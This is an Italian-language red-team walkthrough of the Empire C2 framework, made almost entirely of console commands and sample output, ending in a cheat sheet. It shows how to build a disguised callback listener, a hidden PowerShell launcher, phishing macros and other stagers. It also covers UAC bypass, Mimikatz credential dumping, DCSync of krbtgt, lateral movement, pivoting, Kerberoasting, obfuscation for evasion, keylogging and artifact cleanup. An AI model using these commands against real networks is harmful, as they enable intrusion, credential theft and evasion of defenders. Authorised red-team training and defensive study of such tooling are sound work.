Empire: framework C2 post-exploitation per red team operation

# Verifica versione Python (richiesto 3.10+)
python3 --version

# Clone repository BC Security
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire

# Esecuzione script di setup (installa dipendenze, crea database)
sudo ./setup/install.sh

# Avvio server Empire
sudo ./ps-empire server

# Output atteso:
# [*] Loading listeners
# [*] Loading agents
# [*] Loading modules
# [*] Starting Empire RESTful API on 0.0.0.0:1337
# [*] Starting Starkiller on 0.0.0.0:1337

# In un nuovo terminale, avvia il client
./ps-empire client

# Output: prompt di configurazione
# Username: admin
# Password: [crea password sicura]

# Connessione al server
(Empire) > listeners
(Empire: listeners) > 

# Verifica moduli disponibili
(Empire) > usemodule 
# TAB completion mostra ~400 moduli

# Test listener HTTP
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: http) > info
# Verifica parametri Host, Port, Name

(Empire: listeners) > uselistener http
(Empire: http) > set Name corporate-update
(Empire: http) > set Host http://192.168.1.100:8080
(Empire: http) > set Port 8080

# Profilo HTTP per mimetizzazione traffico
(Empire: http) > set DefaultProfile /admin/get.php,/news.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

# UserAgent realistico per blending
(Empire: http) > set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

(Empire: http) > execute
[*] Starting listener 'corporate-update'
[+] Listener successfully started!

# Launcher PowerShell base64 (delivery via clipboard, SMB)
(Empire) > usestager multi/launcher
(Empire: multi/launcher) > set Listener corporate-update
(Empire: multi/launcher) > execute

# Output: one-liner PowerShell base64
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAcwB0AGU...

# Macro Office (delivery via phishing)
(Empire) > usestager windows/macro
(Empire: windows/macro) > set Listener corporate-update
(Empire: windows/macro) > set OutFile /tmp/macro.vba
(Empire: windows/macro) > execute
[*] Macro written to /tmp/macro.vba

# DLL per DLL hijacking
(Empire) > usestager windows/dll
(Empire: windows/dll) > set Listener corporate-update
(Empire: windows/dll) > set Arch x64
(Empire: windows/dll) > execute

# HTA per delivery via browser
(Empire) > usestager windows/hta
(Empire: windows/hta) > set Listener corporate-update
(Empire: windows/hta) > execute

# Visualizza agent attivi
(Empire) > agents

# Output:
# Name      Internal IP     External IP  Hostname  High Integrity
# ----      -----------     -----------  --------  --------------
# AB3D2F1   192.168.1.55    1.2.3.4      WKS-01    False

# Interazione con agent specifico
(Empire) > interact AB3D2F1
(Empire: AB3D2F1) > 

# Comandi base
(Empire: AB3D2F1) > shell whoami
corp\jdoe

(Empire: AB3D2F1) > shell hostname
WKS-01

# Info agent dettagliate
(Empire: AB3D2F1) > info

# UAC bypass tramite Fodhelper (Windows 10/11)
(Empire: AB3D2F1) > usemodule powershell/privesc/bypassuac_fodhelper
(Empire: bypassuac_fodhelper) > execute

# AlwaysInstallElevated check e exploit
(Empire: AB3D2F1) > usemodule powershell/privesc/powerup/allchecks
(Empire: allchecks) > execute

# Output: identifica misconfigurazioni exploitabili
# [*] Checking for AlwaysInstallElevated registry key...
# [+] AlwaysInstallElevated enabled!

# Token manipulation (steal SYSTEM token)
(Empire: AB3D2F1) > usemodule powershell/privesc/get_system
(Empire: get_system) > execute

# Verifica elevazione
(Empire: AB3D2F1) > shell whoami /priv
# Privilege Name          Description
# SeDebugPrivilege        Debug programs (Enabled)

# Logonpasswords dump
(Empire: AB3D2F1) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: logonpasswords) > execute

# Output:
# Authentication Id : 0 ; 123456
# User Name         : jsmith
# Domain            : CORP
# NTLM              : 5f4dcc3b5aa765d61d8327deb882cf99

# DCSync per hash krbtgt (richiede Domain Admin)
(Empire: AB3D2F1) > usemodule powershell/credentials/mimikatz/dcsync
(Empire: dcsync) > set user krbtgt
(Empire: dcsync) > set domain corp.local
(Empire: dcsync) > execute

# Da agent WKS-01, movimento verso SRV-FILE
(Empire: AB3D2F1) > usemodule powershell/lateral_movement/invoke_wmi
(Empire: invoke_wmi) > set ComputerName SRV-FILE.corp.local
(Empire: invoke_wmi) > set Listener corporate-update
(Empire: invoke_wmi) > set CredID 1
# CredID riferimento a credenziali precedentemente harvested

(Empire: invoke_wmi) > execute

# Timeline: 15-30 secondi
# Output: nuovo agent da SRV-FILE

(Empire) > agents
# Name      Internal IP     Hostname  
# AB3D2F1   192.168.1.55    WKS-01    
# CD4E5G2   192.168.1.70    SRV-FILE  <- nuovo

# Invoke-Command su target remoto
(Empire: AB3D2F1) > usemodule powershell/lateral_movement/invoke_psremoting
(Empire: invoke_psremoting) > set ComputerName DC01.corp.local
(Empire: invoke_psremoting) > set Listener corporate-update
(Empire: invoke_psremoting) > set UserName corp\administrator
(Empire: invoke_psremoting) > set Password SecureP@ss123
(Empire: invoke_psremoting) > execute

# Se fallisce: verificare WinRM enabled
# COSA FARE: 
# (Empire: AB3D2F1) > shell winrm quickconfig -q

# Sul server Empire
(Empire) > uselistener http_hop
(Empire: http_hop) > set RedirectListener corporate-update
(Empire: http_hop) > set Host http://192.168.10.50:8081
(Empire: http_hop) > execute

# Sul compromised host con accesso a subnet interna
(Empire: AB3D2F1) > usemodule powershell/management/invoke_script
(Empire: invoke_script) > set ScriptPath /tmp/hop-server.ps1
(Empire: invoke_script) > execute

# Agent da subnet interna connettono a hop, che relay a C2

# Fase 1: Initial Access (agent già attivo da phishing)
(Empire) > agents
# AB3D2F1 - jdoe@WKS-01 (user context)

# Fase 2: Reconnaissance con PowerView
(Empire: AB3D2F1) > usemodule powershell/situational_awareness/network/powerview/get_domain_computer
(Empire: get_domain_computer) > execute
# Output: lista 50 computer nel dominio

# Fase 3: Privilege Escalation locale
(Empire: AB3D2F1) > usemodule powershell/privesc/bypassuac_eventvwr
(Empire: bypassuac_eventvwr) > execute
# Nuovo agent con High Integrity

# Fase 4: Credential Harvesting
(Empire: AB3D2F1) > usemodule powershell/credentials/mimikatz/logonpasswords
# Hash Domain Admin trovato in memoria

# Fase 5: Lateral Movement verso DC
(Empire: AB3D2F1) > usemodule powershell/lateral_movement/invoke_psexec
(Empire: invoke_psexec) > set ComputerName DC01
(Empire: invoke_psexec) > set CredID 3
(Empire: invoke_psexec) > execute

# Fase 6: DCSync
(Empire: CD4E5G2) > usemodule powershell/credentials/mimikatz/dcsync
(Empire: dcsync) > set user krbtgt
(Empire: dcsync) > execute
# Hash krbtgt estratto - Golden Ticket ready

# Usa profilo che mimetizza traffico jQuery CDN
(Empire) > uselistener http
(Empire: http) > set DefaultProfile /jquery-3.3.1.min.js|Mozilla/5.0
(Empire: http) > set ServerVersion Microsoft-IIS/8.5
(Empire: http) > execute

# Abilita obfuscation per singolo modulo
(Empire: AB3D2F1) > usemodule powershell/credentials/mimikatz/logonpasswords
(Empire: logonpasswords) > set Obfuscate True
(Empire: logonpasswords) > set ObfuscateCommand Token\All\1
(Empire: logonpasswords) > execute

# Configura agent sleep time e jitter
(Empire: AB3D2F1) > sleep 120 30
# Sleep 120 secondi con jitter 30% (96-144 secondi randomizzati)

# Kill date per auto-destruction
(Empire: AB3D2F1) > set killdate 2026-03-15

# Verifica listener attivo
(Empire) > listeners
# Listener deve mostrare [*] Running

# Test stager locale
powershell.exe -File stager.ps1
# Verifica errori PowerShell

# Cambia porta listener (443, 80 spesso consentite)
(Empire: http) > set Port 443

# Usa obfuscation
set Obfuscate True

# Modifica manualmente module source
# Location: Empire/data/module_source/

# Alternativa: C# agent invece di PowerShell
(Empire) > usestager windows/csharp_exe

# Backup database
cp empire/server/data/empire.db empire/server/data/empire.db.backup

# Reset database
./ps-empire server --reset

# Import agent da backup (se necessario)
# Manuale via SQLite

(Empire: AB3D2F1) > usemodule powershell/credentials/invoke_kerberoast
(Empire: invoke_kerberoast) > set Background True
(Empire: invoke_kerberoast) > execute

# Verifica job status
(Empire: AB3D2F1) > jobs

# Via Empire shell
(Empire) > database cleanup 30
# Rimuove task più vecchi di 30 giorni

# Terminazione agent
(Empire: AB3D2F1) > exit

# Cleanup artefatti
(Empire: AB3D2F1) > usemodule powershell/management/remove_artifacts
(Empire: remove_artifacts) > execute

# Kill all agents
(Empire) > agents
(Empire) > kill all

# === SERVER & CLIENT ===
./ps-empire server                                    # Avvia server
./ps-empire client                                    # Avvia client CLI
https://localhost:1337                                # Starkiller web UI

# === LISTENER ===
listeners                                             # Lista listener
uselistener http                                      # Seleziona listener
set Host http://IP:PORT                               # Configura host
set Name custom-listener                              # Nome listener
execute                                               # Avvia listener
kill LISTENER_NAME                                    # Stop listener

# === STAGER ===
usestager multi/launcher                              # Stager PowerShell
usestager windows/macro                               # Macro Office
usestager windows/dll                                 # DLL stager
usestager windows/csharp_exe                          # EXE C#
set Listener LISTENER_NAME                            # Associa listener
execute                                               # Genera stager

# === AGENT MANAGEMENT ===
agents                                                # Lista agent
interact AGENT_NAME                                   # Interagisci agent
shell COMMAND                                         # Esegui comando
upload /local/path C:\remote\path                     # Upload file
download C:\remote\file /local/path                   # Download file
sleep SECONDS JITTER_PCT                              # Configura sleep
kill                                                  # Termina agent

# === MODULI ESSENZIALI ===
usemodule powershell/situational_awareness/network/powerview/get_domain_user
usemodule powershell/credentials/mimikatz/logonpasswords
usemodule powershell/credentials/mimikatz/dcsync
usemodule powershell/privesc/bypassuac_fodhelper
usemodule powershell/lateral_movement/invoke_wmi
usemodule powershell/persistence/elevated/registry
usemodule powershell/collection/keylogger

# === CREDENTIALS ===
creds                                                 # Visualizza creds
creds add DOMAIN USERNAME PASSWORD                    # Aggiungi creds
creds export /tmp/creds.csv                           # Esporta creds

# === DATABASE & REPORTING ===
database cleanup 30                                   # Cleanup task >30 giorni
reporting                                             # Genera report